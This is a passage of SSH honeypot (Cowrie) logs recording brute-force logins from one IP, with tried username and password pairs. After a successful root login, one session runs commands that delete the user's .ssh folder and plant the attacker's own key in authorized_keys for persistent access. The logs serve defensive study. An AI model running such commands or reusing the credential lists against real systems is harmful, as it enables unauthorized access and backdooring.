group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:03:25.857158Z","src_ip":"212.227.235.229","session":"899e4b07f68a"}
{"eventid":"cowrie.login.failed","username":"nginx","password":"111111","message":"login attempt [nginx/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:03:26.929513Z","src_ip":"212.227.235.229","session":"899e4b07f68a"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:28.200076Z","src_ip":"212.227.235.229","session":"899e4b07f68a"}
{"eventid":"cowrie.session.closed","duration":30.450726985931396,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:32.139463Z","src_ip":"218.201.87.66","session":"2fba7af09ef7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60508,"dst_ip":"1.2.3.4","dst_port":22,"session":"e9e6934b5037","protocol":"ssh","message":"New connection: 212.227.235.229:60508 (1.2.3.4:22) [session: e9e6934b5037]","sensor":"my-vps","timestamp":"2025-09-09T02:03:34.269775Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:03:34.270845Z","src_ip":"212.227.235.229","session":"e9e6934b5037"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:03:34.536777Z","src_ip":"212.227.235.229","session":"e9e6934b5037"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:03:35.642766Z","src_ip":"212.227.235.229","session":"e9e6934b5037"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:36.911540Z","src_ip":"212.227.235.229","session":"e9e6934b5037"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":53748,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5e9bfb01fc7","protocol":"ssh","message":"New connection: 212.227.235.229:53748 (1.2.3.4:22) [session: d5e9bfb01fc7]","sensor":"my-vps","timestamp":"2025-09-09T02:03:48.808592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:03:48.809495Z","src_ip":"212.227.235.229","session":"d5e9bfb01fc7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:03:48.916981Z","src_ip":"212.227.235.229","session":"d5e9bfb01fc7"}
{"eventid":"cowrie.login.failed","username":"info","password":"abc123","message":"login attempt [info/abc123] failed","sensor":"my-vps","timestamp":"2025-09-09T02:03:49.390917Z","src_ip":"212.227.235.229","session":"d5e9bfb01fc7"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:03:50.501927Z","src_ip":"212.227.235.229","session":"d5e9bfb01fc7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47657,"dst_ip":"1.2.3.4","dst_port":22,"session":"a7cea681282a","protocol":"ssh","message":"New connection: 212.227.235.229:47657 (1.2.3.4:22) [session: a7cea681282a]","sensor":"my-vps","timestamp":"2025-09-09T02:04:06.047746Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:06.048765Z","src_ip":"212.227.235.229","session":"a7cea681282a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:06.273104Z","src_ip":"212.227.235.229","session":"a7cea681282a"}
{"eventid":"cowrie.login.failed","username":"test","password":"111111","message":"login attempt [test/111111] failed","sensor":"my-vps","timestamp":"2025-09-09T02:04:07.212198Z","src_ip":"212.227.235.229","session":"a7cea681282a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:08.439161Z","src_ip":"212.227.235.229","session":"a7cea681282a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43564,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b83210c16c","protocol":"ssh","message":"New connection: 212.227.235.229:43564 (1.2.3.4:22) [session: 43b83210c16c]","sensor":"my-vps","timestamp":"2025-09-09T02:04:09.878720Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:09.880115Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:10.121511Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.login.success","username":"root","password":"Kong@2022","message":"login attempt [root/Kong@2022] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:04:11.127469Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:04:11.664341Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:04:11.665055Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-09-09T02:04:11.666188Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:11.908702Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-09-09T02:04:12.450352Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-09-09T02:04:12.451083Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-09-09T02:04:12.694955Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:12.695941Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54062,"dst_ip":"1.2.3.4","dst_port":22,"session":"9f30bbf0273b","protocol":"ssh","message":"New connection: 212.227.235.229:54062 (1.2.3.4:22) [session: 9f30bbf0273b]","sensor":"my-vps","timestamp":"2025-09-09T02:04:12.936538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:12.937518Z","src_ip":"212.227.235.229","session":"9f30bbf0273b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:13.178741Z","src_ip":"212.227.235.229","session":"9f30bbf0273b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52962,"dst_ip":"1.2.3.4","dst_port":22,"session":"604bb0255373","protocol":"ssh","message":"New connection: 212.227.235.229:52962 (1.2.3.4:22) [session: 604bb0255373]","sensor":"my-vps","timestamp":"2025-09-09T02:04:13.305421Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:13.306483Z","src_ip":"212.227.235.229","session":"604bb0255373"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:13.389806Z","src_ip":"212.227.235.229","session":"604bb0255373"}
{"eventid":"cowrie.login.failed","username":"pedrito","password":"pedrito","message":"login attempt [pedrito/pedrito] failed","sensor":"my-vps","timestamp":"2025-09-09T02:04:13.764678Z","src_ip":"212.227.235.229","session":"604bb0255373"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-09-09T02:04:14.183608Z","src_ip":"212.227.235.229","session":"9f30bbf0273b"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:14.850565Z","src_ip":"212.227.235.229","session":"604bb0255373"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:15.426583Z","src_ip":"212.227.235.229","session":"9f30bbf0273b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54074,"dst_ip":"1.2.3.4","dst_port":22,"session":"80be7b4f31f9","protocol":"ssh","message":"New connection: 212.227.235.229:54074 (1.2.3.4:22) [session: 80be7b4f31f9]","sensor":"my-vps","timestamp":"2025-09-09T02:04:15.667090Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:15.668016Z","src_ip":"212.227.235.229","session":"80be7b4f31f9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:15.909238Z","src_ip":"212.227.235.229","session":"80be7b4f31f9"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-09-09T02:04:16.915530Z","src_ip":"212.227.235.229","session":"80be7b4f31f9"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:17.158423Z","src_ip":"212.227.235.229","session":"43b83210c16c"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:17.159361Z","src_ip":"212.227.235.229","session":"80be7b4f31f9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57356,"dst_ip":"1.2.3.4","dst_port":22,"session":"aaeb69afd317","protocol":"ssh","message":"New connection: 212.227.235.229:57356 (1.2.3.4:22) [session: aaeb69afd317]","sensor":"my-vps","timestamp":"2025-09-09T02:04:42.333155Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58442,"dst_ip":"1.2.3.4","dst_port":22,"session":"bb717b5fb224","protocol":"ssh","message":"New connection: 212.227.235.229:58442 (1.2.3.4:22) [session: bb717b5fb224]","sensor":"my-vps","timestamp":"2025-09-09T02:04:49.520898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:04:49.521790Z","src_ip":"212.227.235.229","session":"bb717b5fb224"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-09-09T02:04:49.787522Z","src_ip":"212.227.235.229","session":"bb717b5fb224"}
{"eventid":"cowrie.login.failed","username":"tester","password":"12345678","message":"login attempt [tester/12345678] failed","sensor":"my-vps","timestamp":"2025-09-09T02:04:50.891934Z","src_ip":"212.227.235.229","session":"bb717b5fb224"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-09-09T02:04:52.160145Z","src_ip":"212.227.235.229","session":"bb717b5fb224"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33188,"dst_ip":"1.2.3.4","dst_port":22,"session":"9b30753c0ed1","protocol":"ssh","message":"New connection: 212.227.235.229:33188 (1.2.3.4:22) [session: 9b30753c0ed1]","sensor":"my-vps","timestamp":"2025-09-09T02:05:09.058442Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-09-09T02:05:09.060061Z","src_ip":"212.227.235.229","session":"9b30753c0ed1"}
